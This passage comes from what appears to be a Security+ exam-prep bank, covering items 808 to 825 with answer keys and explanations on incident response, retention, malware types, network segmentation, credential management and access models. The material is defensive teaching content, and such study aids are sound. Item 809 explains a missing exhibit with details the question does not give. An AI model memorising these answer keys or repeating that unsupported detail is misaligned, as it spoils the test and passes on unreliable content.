Option A is wrong because reimaging the workstation destroys potential evidence (e.g., malware binaries, registry keys, log files) before forensic analysis can be performed, violating the order of the incident response process. Option C is wrong because resetting the user's password addresses authentication but does not remediate the underlying compromise (e.g., a backdoor or data exfiltration tool) and is not the immediate next step after isolation. Option D is wrong because notifying law enforcement is a strategic decision that typically occurs after evidence is collected and the incident is fully characterized, not as the immediate next step after isolation.

808
MCQmedium

A records manager finds a folder of payroll reports on a shared drive. The business says the reports are no longer active, but legal retention rules require keeping them for another two years. What is the best action?

A.Delete the reports immediately because the business no longer uses them
B.Move the reports to an approved archive and retain them for the required period
C.Email the reports to each manager so they can keep their own copy
D.Rename the folder so users do not notice it on the shared drive
AnswerB

An approved archive preserves the records for the retention period while keeping them controlled and available for audit or legal needs.

Why this answer

Option B is correct because the reports are subject to a legal retention policy requiring two more years of storage. Moving them to an approved archive ensures they remain accessible for compliance purposes while removing them from the active shared drive, which reduces the risk of accidental modification or deletion. This aligns with data lifecycle management and legal hold procedures.

Exam trap

The trap here is that candidates may assume 'no longer active' means the data can be deleted, ignoring the overriding legal retention requirement, or they may think renaming or distributing files is a valid workaround instead of using a proper archive solution.

How to eliminate wrong answers

Option A is wrong because deleting the reports immediately violates the legal retention requirement, exposing the organization to non-compliance penalties. Option C is wrong because emailing reports to managers creates uncontrolled copies, increases the risk of data leakage, and does not ensure centralized retention or auditability. Option D is wrong because renaming the folder does not address the retention requirement and may lead to data loss or unauthorized access if the folder is still on the shared drive.

809
MCQmedium

Based on the exhibit, what type of malware is the most likely issue on the workstation?

A.Spyware, because the system appears to be collecting user data silently.
B.Ransomware, because the browser settings changed after installation.
C.Rootkit, because the endpoint security console detected an unknown process.
D.Worm, because the software was installed from an unofficial website.
AnswerA

Spyware is the best fit because the symptoms show covert data collection and tracking behavior. The unwanted browser extension, the repeated outbound traffic to a tracking domain, and the access to saved cookies all point to surveillance and data theft rather than encryption or destructive behavior.

Why this answer

The exhibit shows a browser extension installed from an unofficial website that is silently collecting browsing data, including keystrokes and visited URLs, which is characteristic of spyware. Spyware operates by gathering user information without consent, often through seemingly legitimate software, and the absence of encryption or user notification confirms this classification.

Exam trap

The trap here is that candidates confuse the symptom of changed browser settings with ransomware, but ransomware's primary action is file encryption or system lockout, not silent data collection, and the unofficial website installation is a red herring for worm propagation.

How to eliminate wrong answers

Option B is wrong because ransomware typically encrypts files or locks the system and demands payment, not merely changes browser settings after installation. Option C is wrong because a rootkit is designed to hide its presence and evade detection by security software, so an endpoint security console detecting an unknown process would indicate a different threat, not a rootkit. Option D is wrong because a worm self-replicates and spreads across networks without user interaction, whereas the issue here involves installation from an unofficial website, which is a common vector for spyware, not a worm.

810
MCQmedium

A vulnerability scan of a branch-office print server finds that its administrative web console is reachable from the internet. The appliance is still using the vendor's default password, and no access control list limits management access to the office subnet or VPN. Which remediation would reduce risk the most with the least disruption?

A.Increase the password length policy and leave the console publicly reachable.
B.Disable the management interface entirely and replace the device immediately.
C.Restrict management access to the office network or VPN and change the default credentials.
D.Apply a patch after the next quarterly maintenance window and keep the current exposure unchanged.
AnswerC

This is the best balance of security and operational impact. Publicly exposed administration interfaces are high-risk, especially when default credentials are still enabled. Limiting access to a trusted management network or VPN immediately reduces attack surface, while changing the vendor defaults removes a common compromise path. Together, these steps address the exposure without requiring a full replacement or major service outage.

Why this answer

Option C reduces risk the most with the least disruption by immediately addressing the two primary vulnerabilities: the default password and unrestricted internet exposure. Changing the default credentials prevents trivial authentication bypass, while restricting management access to the office subnet or VPN eliminates the attack surface from the public internet. This approach requires no hardware replacement or downtime, and it directly mitigates the highest-severity issues identified in the scan.

Exam trap

The trap here is that candidates may choose Option B (disable and replace) because it seems most secure, but they overlook that configuration changes (ACL and password reset) achieve the same security goal with far less disruption and cost.

How to eliminate wrong answers

Option A is wrong because increasing the password length policy does not address the fact that the default password is still in use; an attacker can still authenticate with the known default credential, rendering the policy change irrelevant. Option B is wrong because disabling the management interface entirely and replacing the device immediately is unnecessarily disruptive and costly; the device can be secured with configuration changes without replacement, and disabling the interface may prevent necessary administrative tasks. Option D is wrong because applying a patch after the next quarterly maintenance window leaves the console publicly reachable with default credentials for an extended period, which is a critical risk that should be remediated immediately, not deferred.

811
MCQmedium

Several Windows servers were built from the same image, and all of them use the same local Administrator password. What is the best operational hardening change?

A.Keep the shared password but store it in a spreadsheet with restricted access.
B.Implement a tool that automatically sets unique local admin passwords on each server.
C.Remove all administrator accounts from the servers.
D.Change the password manually once a year on one server only.
AnswerB

This is the best hardening change because shared local administrator passwords create an easy lateral-movement path if one server or credential is exposed. A password management solution that generates unique local admin passwords reduces blast radius while preserving administrative access. It also supports safer operational management because the passwords can still be retrieved or rotated through controlled processes instead of being duplicated across systems.

Why this answer

Option B is correct because using a tool like Local Administrator Password Solution (LAPS) automates the rotation of unique, complex passwords for each server's local administrator account. This eliminates the risk of lateral movement if one server's credentials are compromised, as each machine has a distinct password stored securely in Active Directory.

Exam trap

The trap here is that candidates may think storing the password securely (Option A) is sufficient, but the core issue is the shared password itself, not just its storage; the exam emphasizes eliminating shared credentials across systems to prevent lateral movement.

How to eliminate wrong answers

Option A is wrong because storing the shared password in a spreadsheet, even with restricted access, still leaves a single point of failure; if the spreadsheet is breached, all servers are compromised. Option C is wrong because removing all administrator accounts would break essential administrative functions and is not a recommended hardening practice; instead, you should rename or disable the built-in Administrator account. Option D is wrong because manually changing the password once a year on only one server does not address the shared password issue across all servers and leaves the others vulnerable indefinitely.

812
MCQmedium

A branch office stores nightly backups on a NAS that is joined to the same Active Directory domain as the production servers. After a ransomware incident, management wants a backup design that is much harder for attackers to encrypt or delete. Which approach is the best improvement?

A.Increase the backup frequency to every hour while keeping the same NAS design.
B.Store all backups on the same network segment for faster restore access.
C.Maintain an offline or immutable backup copy in a separate administrative boundary.
D.Use only snapshots on the production storage array because they are instant to restore.
AnswerC

Offline or immutable backups resist tampering and remain available even if the production domain is compromised.

Why this answer

Option C is correct because maintaining an offline or immutable backup copy in a separate administrative boundary ensures that attackers cannot encrypt or delete the backups, even if they compromise the Active Directory domain. An offline backup (e.g., tape or disconnected disk) is physically isolated, while immutable backups (e.g., using S3 Object Lock or a NAS with WORM capabilities) prevent modification or deletion for a defined retention period. This design breaks the attacker's ability to propagate ransomware to the backup repository, addressing the core requirement of making backups much harder to encrypt or delete.

Exam trap

The trap here is that candidates often assume increasing backup frequency or keeping backups on the same network segment improves recovery speed, but they overlook the fundamental need for isolation and immutability to protect against ransomware encryption and deletion.

How to eliminate wrong answers

Option A is wrong because increasing backup frequency to every hour on the same NAS joined to Active Directory does not prevent attackers from encrypting or deleting the backups; if the NAS is compromised via the domain, all copies remain vulnerable. Option B is wrong because storing all backups on the same network segment as production servers increases the attack surface and allows ransomware to spread laterally to the backup storage, defeating the goal of isolation.

813
MCQ · easy

A company wants every corporate laptop to use the same required screen-lock timeout, disk encryption setting, and local administrator restriction. Which document should define these mandatory settings?

A. A guideline, because it offers flexible suggestions for users
B. A standard, because it specifies required configuration values
C. A procedure, because it explains the business reason for security rules
D. A memo, because it is the fastest way to communicate changes
Answer: B

A standard sets the exact mandatory baseline that all devices must follow consistently.

Why this answer

A standard is the correct document type because it mandates specific, measurable configuration values (e.g., screen-lock timeout of 300 seconds, AES-256 disk encryption, removal of local admin rights) that all corporate laptops must enforce. Standards are binding and establish a baseline for security compliance, unlike guidelines which are advisory. This aligns with the company's requirement for mandatory, uniform settings across all devices.

Exam trap

The trap here is confusing a 'standard' (which sets mandatory, measurable requirements) with a 'guideline' (which is optional and advisory), leading candidates to pick A because they think 'required' implies flexibility, when in fact standards are the only document type that enforces specific configuration values.

How to eliminate wrong answers

Option A is wrong because a guideline offers flexible suggestions or recommendations, not mandatory requirements, so it cannot enforce the required screen-lock timeout, disk encryption, or local administrator restriction. Option C is wrong because a procedure describes step-by-step instructions for performing a task (e.g., how to configure the screen-lock timeout), not the mandatory configuration values themselves; it explains the 'how,' not the 'what must be set.'

814
Multi-Select · medium

Employees use a browser SaaS portal, a native mobile app, and an internal API. The company wants one corporate identity, reduced password reuse, and automated removal of access when HR terminates users. Which two solutions best meet the requirement? Select two.

Select 2 answers
A. Create separate local usernames and passwords in each application for every employee.
B. Use federation so the SaaS apps trust the company's identity provider.
C. Store passwords in a shared vault and let users retrieve them when needed.
D. Automate account provisioning and deprovisioning from HR changes with SCIM or an equivalent feed.
E. Allow the mobile app to authenticate only from remembered devices, without central identity controls.
Answers: B, D

Federation centralizes authentication at the corporate identity provider and reduces separate credential stores.

Why this answer

Federation (B) allows the SaaS portal, mobile app, and internal API to trust a single corporate identity provider (IdP) using standards like SAML 2.0 or OIDC. This gives employees one set of credentials, reduces password reuse, and enables centralized control. When HR terminates a user, the IdP can revoke access instantly, affecting all federated applications.

Exam trap

The trap here is that candidates often think federation alone solves all identity lifecycle problems, but the question explicitly requires automated removal of access, which demands a provisioning protocol like SCIM in addition to federation.

815
MCQ · easy

A company wants to state that customer data must not be emailed externally unless a manager approves the exception. Which document type should contain this rule?

A. Policy, because it establishes mandatory organizational rules
B. Guideline, because it gives staff flexible suggestions about email use
C. Procedure, because it lists the exact button clicks for sending email
D. Standard, because it provides a general recommendation for communication
Answer: A

A policy is the correct choice when the company wants to set a mandatory rule that applies organization-wide and governs behavior.

Why this answer

A policy is the correct document type because it establishes mandatory organizational rules that must be followed. The requirement that customer data must not be emailed externally without manager approval is a binding directive, not a suggestion or a step-by-step guide. Policies define high-level security requirements that all employees must comply with, making them the appropriate vehicle for this rule.

Exam trap

The trap here is that candidates often confuse 'policy' with 'standard' or 'guideline', mistakenly thinking a rule about data transmission is a technical standard or a flexible suggestion, when in fact it is a mandatory organizational directive that must be enforced.

How to eliminate wrong answers

Option B is wrong because a guideline provides flexible suggestions or best practices, not mandatory rules; this requirement is a strict prohibition, not a recommendation. Option C is wrong because a procedure lists detailed step-by-step instructions (e.g., exact button clicks in an email client), not a high-level rule about data handling. Option D is wrong because a standard specifies technical specifications or configurations (e.g., encryption protocols like TLS 1.2), not a general rule about data transmission approval.

816
MCQ · easy

A scan finds two issues: a critical vulnerability on an internet-facing VPN appliance with public exploit code, and a medium-severity issue on an internal test server. Which should be fixed first?

A. The internal test server issue, because test systems are always higher risk.
B. The VPN appliance issue, because it is critical and publicly exploitable.
C. Both issues at the same time without assigning a priority.
D. Neither issue, because scanners can produce false positives.
Answer: B

An internet-facing critical vulnerability with available exploit code presents a much higher likelihood of real-world compromise and should be prioritized first.

Why this answer

The VPN appliance issue should be fixed first because it is a critical vulnerability on an internet-facing system with publicly available exploit code. This combination means an attacker can directly compromise the appliance from the internet with minimal effort, leading to potential network breach and lateral movement. In contrast, the internal test server is less accessible and poses a lower immediate risk, even though it should still be addressed in due course.

Exam trap

The trap here is that candidates assume all vulnerabilities must be fixed in order of severity alone, ignoring the critical factor of asset exposure and exploitability, which CompTIA emphasizes in risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because test systems are not inherently higher risk than internet-facing production systems; the risk is determined by exposure, exploitability, and impact, not by system role alone. Option C is wrong because security resources are finite and prioritization is essential; treating all issues equally ignores the urgency of a critical, publicly exploitable vulnerability on an internet-facing asset.

817
Multi-Select · easy

A small business web server still allows remote administration from the internet on port 3389, and the administrator password has never been changed from the vendor default. Which two issues should the security team prioritize first? Select two.

Select 2 answers
A. An exposed remote administration service
B. Default credentials still being in use
C. A missing screen-lock timeout on nearby laptops
D. A lack of encrypted email attachments
E. An outdated printer driver on the finance network
Answers: A, B

An internet-exposed management service is risky because it gives attackers a direct path to the system from outside the network.

Why this answer

Port 3389 is used by Remote Desktop Protocol (RDP), which is a remote administration service. Exposing RDP directly to the internet is a critical vulnerability because it allows attackers to perform brute-force or credential-stuffing attacks against the service. This is a high-priority issue because it provides an attack vector that can lead to full system compromise.

Exam trap

The trap here is that candidates may overlook the combination of exposed RDP and default credentials as the most urgent issues, instead focusing on a less critical physical security control like screen-lock timeout, which is not directly related to the internet-facing vulnerability.

818
MCQ · easy

A critical patch must be applied to a retail point-of-sale server. What is the best way to reduce business disruption?

A. Apply the patch during the busiest business hours to make the change sooner.
B. Schedule the patch during an approved maintenance window.
C. Skip the patch and rely on hope that the issue will not be exploited.
D. Turn off all backups so the patch process runs faster.
Answer: B

A maintenance window is the best choice because it lets the organization perform the update when user impact is expected to be lowest. This is a core change-control practice for systems that support business operations. It gives the team time to test, monitor, and recover if something goes wrong without affecting customers during peak use.

Why this answer

Scheduling the patch during an approved maintenance window is the best practice to minimize business disruption because it allows the organization to plan for downtime during low-activity periods, coordinate with stakeholders, and ensure rollback procedures are in place. For a retail point-of-sale (POS) server, applying a critical patch outside of business hours prevents transaction interruptions and potential revenue loss, aligning with change management policies that prioritize availability and security.

Exam trap

The trap here is that candidates may choose Option A, thinking that applying a patch sooner reduces risk, but they overlook the immediate business disruption and the importance of change management processes that prioritize availability over speed.

How to eliminate wrong answers

Option A is wrong because applying a patch during busiest business hours would directly disrupt customer transactions, causing immediate revenue loss and potential data integrity issues, which contradicts the goal of reducing business disruption. Option C is wrong because skipping a critical patch leaves the POS server vulnerable to known exploits, such as remote code execution or data breaches, which can lead to greater long-term disruption and regulatory non-compliance. Option D is wrong because turning off backups eliminates the ability to restore the system to a known good state if the patch causes a failure, increasing the risk of extended downtime and data loss.

819
MCQ · medium

A security analyst detects a high volume of failed authentication attempts from IP address 203.0.113.1 against a web application. The attempts use different usernames, such as 'admin', 'root', 'test', and several common names. Account lockout policies are configured to lock an account after five failed attempts. Despite this, the analyst sees the attempts continuing over several hours. Which of the following security controls is most likely missing or improperly configured?

A. Increase the account lockout threshold to a lower number
B. Implement geofencing to block traffic from the attacker's region
C. Configure rate limiting per source IP address
D. Enable detailed failed login attempt logging
Answer: C

Rate limiting on the application or firewall level restricts the number of authentication attempts from a single IP address over a given time period, regardless of the username being tried. This directly counters the attacker's strategy of rotating usernames to bypass account lockout.

Why this answer

Rate limiting per source IP address is the correct control because it restricts the number of authentication requests from a single IP (203.0.113.1) within a given time window, regardless of the usernames used. Account lockout policies are ineffective here because the attacker is rotating through different usernames (e.g., 'admin', 'root', 'test'), so no single account reaches the five-failed-attempt threshold. By limiting the request rate from the source IP, the analyst can throttle the attacker's brute-force attempts without affecting legitimate users.

Exam trap

The trap here is that candidates assume account lockout policies are sufficient for all brute-force attacks, but they fail to recognize that rotating usernames (a 'password spraying' attack) bypasses per-account lockout, making per-source-IP rate limiting the correct mitigation.

How to eliminate wrong answers

Option A is wrong because decreasing the lockout threshold (e.g., to 3 attempts) would not stop the attack—the attacker is using different usernames, so no single account ever hits even a lower threshold. Option B is wrong because geofencing blocks traffic based on geographic location, but the attacker could be using a VPN or proxy to appear from a different region, and the question does not indicate the IP is from a specific region that should be blocked. Option D is wrong because enabling detailed failed login attempt logging would only improve visibility into the attack, not prevent or mitigate it; logging is a detective control, not a preventive or throttling control.

820
MCQ · easy

A company is placing its public web server so internet users can reach it, but the database server must stay hidden from the internet and be reachable only by the web server. Which design best supports this goal?

A. Put both servers on the same flat internal network
B. Place the web server in a DMZ and keep the database server on the internal network
C. Put the database server in the DMZ and the web server on the internal network
D. Disable the firewall so the web server can communicate freely with all hosts
Answer: B

A DMZ is designed for internet-facing systems, while the database remains on a more trusted internal segment.

Why this answer

Option B is correct because it uses a DMZ (demilitarized zone) to isolate the public-facing web server from the internal network. The web server in the DMZ is accessible from the internet, while the database server remains on the internal network, reachable only by the web server through a firewall rule that permits traffic on the specific database port (e.g., TCP 3306 for MySQL). This layered security design prevents direct internet access to sensitive data.

Exam trap

The trap here is that candidates may think placing the database server in the DMZ is acceptable because it is 'protected' by a firewall, but they overlook that the DMZ is still accessible from the internet, making the database directly reachable and violating the requirement to keep it hidden.

How to eliminate wrong answers

Option A is wrong because placing both servers on the same flat internal network exposes the database server to the internet if the web server is compromised, as there is no network segmentation to restrict lateral movement. Option C is wrong because putting the database server in the DMZ and the web server on the internal network would expose the database directly to the internet, defeating the goal of hiding it, and would require the web server to initiate outbound connections to the DMZ, which is less secure and more complex to manage.

821
MCQ · medium

An IDS generates an alert for possible SQL injection against an internal reporting portal at 02:00. The web logs show the source IP belongs to the company's approved vulnerability scanner, the request path matches the scheduled test window, and the WAF blocked the request. What is the most appropriate analyst conclusion?

A. Treat it as a confirmed intrusion and immediately take the portal offline.
B. Close it as expected activity after validating the scanner schedule and source IP.
C. Classify it as malware because the blocked payload proves the scanner is infected.
D. Disable the WAF rule so the scanner can complete without generating more alerts.
Answer: B

The logs align with an authorized scanner operating during a planned maintenance window, and the WAF successfully blocked the payload. After confirming the scan authorization, the alert can be documented and closed as expected activity rather than escalated as a live attack.

Why this answer

Option B is correct because the alert matches expected, authorized activity: the source IP belongs to the approved vulnerability scanner, the request occurred during the scheduled test window, and the WAF blocked the malicious payload. This is a classic false positive triggered by legitimate security testing, not an actual intrusion. The analyst should validate the scanner schedule and source IP, then close the alert as expected activity.

Exam trap

The trap here is that candidates see a blocked SQL injection payload and assume it is a real attack, forgetting to verify whether the source is an authorized vulnerability scanner operating during a scheduled test window.

How to eliminate wrong answers

Option A is wrong because taking the portal offline is an overreaction to a false positive; the request was from an authorized scanner and blocked by the WAF, so there is no confirmed intrusion. Option C is wrong because classifying the scanner as infected based solely on a blocked SQL injection payload is a logical leap; scanners intentionally send malicious payloads to test defenses, and the WAF block proves the control worked, not that the scanner is compromised. Option D is wrong because disabling the WAF rule would remove protection against real attacks, and the scanner can still complete its tests with the WAF blocking its payloads—the alerts can be tuned or suppressed instead.

822
MCQ · easy

A finance application records each approval with the manager's unique user ID and a digital signature. Auditors want proof that the manager cannot later deny approving the transaction. Which security objective is most directly being addressed?

A. Availability
B. Nonrepudiation
C. Confidentiality
D. Accountability
Answer: B

Nonrepudiation provides strong proof of who performed an action, making later denial difficult or impossible.

Why this answer

Nonrepudiation ensures that a party cannot deny having performed a specific action. By recording the manager's unique user ID and a digital signature, the system provides cryptographic proof that the manager approved the transaction, making it impossible for them to later deny it. This directly addresses the audit requirement for undeniable evidence of approval.

Exam trap

CompTIA often tests the distinction between accountability (logging who did what) and nonrepudiation (cryptographic proof that prevents denial), so candidates may pick 'Accountability' because they see user IDs and logs, missing that the digital signature is the key element for nonrepudiation.

How to eliminate wrong answers

Option A is wrong because availability ensures systems and data are accessible when needed, not that actions cannot be denied. Option C is wrong because confidentiality protects data from unauthorized disclosure, not from denial of actions. Option D is wrong because accountability tracks who performed an action (via user IDs and logs), but without a digital signature, it does not provide cryptographic proof that prevents the manager from repudiating the action; nonrepudiation is the stronger objective that includes accountability plus irrefutable evidence.

823
MCQ · medium

A small company is redesigning its network for a public web application. The web front end must be reachable from the internet, but the database should never be exposed directly to external or general user traffic. Which architecture is the best choice?

A. Place both the web server and database in the same internal subnet and rely on host firewalls.
B. Place the web server in a DMZ and keep the database in a private internal subnet with only required application traffic allowed.
C. Place the database in the DMZ so the web server can query it directly without internal routing.
D. Keep both systems public but restrict access with NAT and strong administrator passwords.
Answer: B

This separates the internet-facing system from the sensitive backend. The DMZ limits exposure of the web server, while the database remains inaccessible from external networks and is reachable only over tightly filtered application ports from the web tier.

Why this answer

Option B is correct because it implements a layered security architecture: the web server resides in a DMZ (demilitarized zone) where it is reachable from the internet, while the database is placed in a private internal subnet with strict firewall rules that only allow the required application traffic (e.g., TCP port 3306 for MySQL or 1433 for MSSQL) from the web server. This ensures the database is never directly exposed to external or general user traffic, reducing the attack surface and preventing direct internet-based attacks on the database.

Exam trap

The trap here is that candidates may think host firewalls are sufficient for internal subnet isolation (Option A) or mistakenly believe placing the database in the DMZ simplifies routing (Option C), overlooking the fundamental security principle of defense in depth and the need to keep sensitive data stores off the internet-facing network.

How to eliminate wrong answers

Option A is wrong because placing both the web server and database in the same internal subnet exposes the database to any compromise of the web server or any internal host, and host firewalls alone are insufficient to prevent lateral movement or internal scanning. Option C is wrong because placing the database in the DMZ directly exposes it to the internet, defeating the purpose of isolation and making it vulnerable to direct attacks from external sources.

824
MCQ · medium

Based on the exhibit, which access model best fits the business requirement without creating many custom roles?

A. RBAC, because every user can be placed into a fixed role that never changes.
B. ABAC, because access can be evaluated using user, resource, and environment attributes together.
C. DAC, because each file owner can decide access individually without any central rule engine.
D. MAC, because users should manually grant access to themselves when needed.
Answer: B

The exhibit requires decisions based on attributes such as department, clearance, project tags, and business unit. ABAC is built for that kind of dynamic rule set and avoids creating a separate role for every possible combination.

Why this answer

B is correct because Attribute-Based Access Control (ABAC) evaluates multiple attributes (user, resource, environment) to dynamically determine access, which fits a business requirement that needs flexible, context-aware permissions without creating many custom roles. Unlike RBAC, ABAC avoids role explosion by using policies that combine attributes, making it ideal for environments where access decisions depend on factors like time, location, or data sensitivity.

Exam trap

The trap here is that candidates often default to RBAC as the simplest model, but the question explicitly requires avoiding many custom roles, which RBAC would necessitate if the business needs are complex or dynamic, whereas ABAC provides attribute-based flexibility without role explosion.

How to eliminate wrong answers

Option A is wrong because RBAC requires predefined roles that are static; if the business needs change frequently, RBAC would require creating many custom roles to accommodate new access patterns, contradicting the requirement to avoid custom roles. Option C is wrong because DAC allows file owners to set permissions individually, which lacks centralized control and cannot efficiently enforce business-wide access policies without custom configurations per resource. Option D is wrong because MAC enforces access based on fixed labels (e.g., security clearances) and does not allow users to grant access to themselves; it is rigid and not suitable for dynamic, attribute-driven requirements.

825
MCQ · easy

A user opens an attached document, and the endpoint security tool shows PowerShell running from memory with no new executable file written to disk. What type of attack is most likely?

A. Fileless attack
B. Ransomware
C. Rootkit
D. Logic bomb
Answer: A

Fileless attacks use legitimate tools or memory-only execution instead of dropping a visible malicious file.

Why this answer

The scenario describes PowerShell running from memory without a new executable file written to disk, which is the hallmark of a fileless attack. Fileless attacks leverage legitimate system tools like PowerShell, WMI, or .NET to execute malicious code directly in memory, bypassing traditional file-based detection mechanisms.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think that any attack using PowerShell must be a script-based attack, but the key indicator is the lack of a new executable file on disk, which distinguishes fileless attacks from traditional malware that writes files.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing executable files to disk or dropping a ransom note; the absence of a new executable file on disk makes this unlikely. Option C (Rootkit) is wrong because rootkits are designed to hide their presence and maintain persistent access, often by modifying the operating system kernel or boot process, not by executing solely from memory without any file artifacts. Option D (Logic bomb) is wrong because a logic bomb is a piece of malicious code that executes under specific conditions (e.g., a date or user action) and is usually embedded within a legitimate file or application, not executed purely from memory without a file.
